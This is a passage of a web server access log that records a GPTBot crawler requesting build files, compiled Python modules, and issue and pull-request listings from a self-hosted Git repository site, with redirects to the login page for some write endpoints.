"/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" +[17/Feb/2026:18:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21826] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" +[17/Feb/2026:18:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11229] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:42:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 9864] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11158] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15272] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:18:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9874] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9877] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:18:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2f%eb%8d%b0%ec%9d%b4%ed%84%b0%eb%b2%a0%ec%9d%b4%ec%8a%a4%20%ed%8a%b8%eb%a6%ac%ea%b1%b0%20%ec%a0%81%ec%9a%a9.md" [Client 74.7.227.38] [Length 22615] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" +[17/Feb/2026:18:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11274] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:42:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:18:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 